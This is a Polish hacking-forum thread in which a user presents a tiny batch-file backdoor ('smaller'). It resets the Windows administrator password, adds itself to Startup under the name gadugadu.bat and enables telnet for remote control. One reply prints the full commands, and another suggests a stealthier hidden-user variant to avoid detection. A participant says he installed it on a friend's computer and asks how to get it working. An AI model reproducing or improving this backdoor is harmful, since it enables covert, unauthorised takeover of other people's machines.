!! smaller 1.0 !!Najmniejszy backdoor!!244bajty!!:D:D!!

[lorenzo]

Panie i panowie przedstawiam wam mini backdorka smaller ver.1.0

www.smaller.friko.pl

Klient to program telnet "start>>uruchom>>telnet".
Trojan ten zmienia hasło administratora na hasło lorenzo
dopisuje się do autostartu i odpala port 23-co powoduje że mamy pełen dostęp do kompa

.Jest nie wykrywalny przez żadnego antywira.Kod można zmieniać dowoli

.Jest napisany w bacie.I jest zajebiscie prosty i pomysłowy.Zajmuje 244bajty(0,224kb)-tyle co trojany pisane w asmie

!!Ale jak to sie mówi:"Małe jest piękne ale duże wiecej potrafi.."tak i tu jest jedna wada...Trojan działa tylko pod Windows Xp,2000,2003serwer i chyba Nt.Uwada nie działa pod win3.11,95,98 i me=
=

Ponieważ inne windowsy<xp nie mają tych funkcji(winapi mają cieńkie

).Funkcje jakie oferuje ten trojan to wszystko to co można robić pod dosem,czyli odpalanie aplikacji,przegladanie plikow,kasowanie,robienie,grzebianie w rejestrze windows itp.

Teraz pracuje nad podobnym trojanem qtóry bedzie działał pod linuxem
(teraz w shellcode będe pisał dla odmiany

).HEhe to chyba wszystko

.
Jak coś zmienicie w kodzie i będzie to coś ciekawego to zarzućcie mi tym kawałkiem kodu

([email protected]). Pozdrawiam!!

 

[LAME-R]

Link nie działa, załóż sobie na jakimś lepszym koncie od friko. (Polecam Lycos).

 

[lorenzo]

ok naprawiłem

jush działa sprawdz teraz.Sorry za fal start ale to wina friko.pl

. Jush wszystko gra tera .

 

[s@S@n]

Hahahaha

rozśmieszyłeś mnie stary to jest cudeńko hahaah lol lol

 

[Chochlik]

S@s@n nie czepiaj sie, moze dla niektorych to jest oczywista sprawa, ale innym moze sie przydac, jak ja napisalem o moim dwulinijkowym downladerze w delphi ktory mial 15 kb to mnie nie wysmiewales :]

 

[Wojass]

http://www.haker.com.pl/forum/viewtopic.ph...ighlight=#45375

 

[Barca]

No Wojass, nie przesadzaj bo różnice konstrukcyjne są kolosalne

A tak poważnie, to nie śmiejcie się, bo się starał

- zawsze coś ;-), tylko nie rozumiem, czemu tych kilku linijek nie dało się wkleić na forum??

 

[Chochlik]

Dobra, lorezno teraz pracuje zeby dzialalo za natem i uzywalo protokolu GG

Albo zeby kontrolowac to umyslem

 

[Marflo]

No nie śmiejcie sie

Przynajmniej zrobil sam jakiegos trojana, a nie tylko czekal az Achates download otworzy i bedzie sobie mogl jakiegos sciagnac

 

[Ccobra]

net user administrator lorenzo

cd c:documents and settingsall usersmenu startprogramyautostart

echo>>"gadugadu.bat" net start telnet

echo>>"gadugadu.bat" net user administrator lorenzo

net start telnet

=====
Popraw mnie jeśli się mylę, Pliki wsadowe niedają za dużo opcji i poraz pierwszy spotykam sięz trojanem który jest napisany w bacie, Teraz tak, mówisz że kopiuje się do autostartu, to co za problem go usunąć F8. Na podstawie tego kodu powiedz mi gdzie kopiuje się do klasycznej ścieżki w rejestrze bo chyba też za głupi jestem bo nie widzę tego.
I na koniec jakie tak naprawdę masz opcje ? bo ani screenu itp, możesz przeglądać, kasować kopiować pliki pod teln. i co jeszcze ?
Proponuję zabrać się za jakiś konkretniejszy język i napisać potężniejszego trojanka

Powodzenia
Ps. Czy ten program można nazwać trojanem ?

 

[Plik]

nie programem do zdalnej administracji ....

nie no nie ma wpsiu do rejestru z tego co widze ...

fajny pomysl z bacikiem ...

pozdrawiam ...

 

[s@S@n]

Originally posted by Marflo
No nie śmiejcie sie

Przynajmniej zrobil sam jakiegos trojana, a nie tylko czekal az Achates download otworzy i bedzie sobie mogl jakiegos sciagnac

Stary jakieś 60% wypowiadających się tu ludzi zrobiła coś własnego.

 

[lorenzo]

hehe spodziewałem się tego

No jak widać niektórzy ludzie się znają, niektórzy poprostu nie

.Widać że code tego trojana

bądz też "aplikacji do zdalnej administracji" jest obskórny, a wy wymagacie

z pistoletu żeby był karabinem(buhahaha).Mogę napisać wam na luzaku trojana fullwypas z opcjami takimi jak ma cafeini lub jeszcze lepszymi ale poprostu nie widziałem sensu żeby na nowo odkrywać amerykę, tak jak to robią co poniektórzy i się cwelą że co to oni nie są

.Ja wam pokazałem nowość

i spodziewałem się że 3/4 z tego to będzie podniecać się że można lepiej i wogóle

(to czemu sami tego lepiej nie pokazaliście wczesniej lol lol lol lol lol lol ;P ).No ide pisać dalej coś ciekawszego

.Piszcie dalej jak coś

-fajnie się to ogółem czyta

i dzięki za odzew,że ktoś jest chociaż zainteresowany tym trojanem

.
Pozdrawiam

 

[rywin]

No moze z nazwaniem tego trojanem przesadziles ale gut idea.
Proponuje nie zmieniac hasla admina bo taki komp dlugo nie postoi w sieci bo koles sie kapnie ze cos jest nie tak. A w zamian proponuje stwozyc nowa grupe o nazwie -> TelnetClients -> nowego_usera -> z grupy uzytkownicy usunac nowego_usera -> dodac nowego_usera do grupy TelnetClients
Jak ktos nie wie po co, to pytac .

 

[SKORPION]

mam pytanie jest wszystko wpożądku wpisuje nazwe użytkownika [administrator] ale niemoge wpisać hasła coś sie blokuje i nieidzie nic napisać co jest grane

 

[Barca]

Zdecyduj się SKORPION bo taki sam post napisałeś w topicu o wykrywaczu. Gdzie niby to wpisujesz bo nic z tego się nie da skumać??

 

[lorenzo]

thx

dzięki rywin skorzystam z tego

i poprawie to.Pozdrawiam

 

[SKORPION]

HODZI OTO, ŻE PROGRAM WŻUCIŁEM NA KOMPA KUMPLA ZA PIERWSZYM RAZEM DZIAŁAŁO, ALE TERAS UDA MISIE POŁĄCZYĆ WPISAĆ NAZWE UŻYTKOWNIKA I NIEMOGE WPISAĆ HASŁA

 

[Knexus]

Originally posted by SKORPION
HODZI OTO, ŻE PROGRAM WŻUCIŁEM NA KOMPA KUMPLA ZA PIERWSZYM RAZEM DZIAŁAŁO, ALE TERAS UDA MISIE POŁĄCZYĆ WPISAĆ NAZWE UŻYTKOWNIKA I NIEMOGE WPISAĆ HASŁA

nie wiem czy to o to chodzi ale jak wpisujesz password to nie widac tego co piszesz

forma zabezpieczenia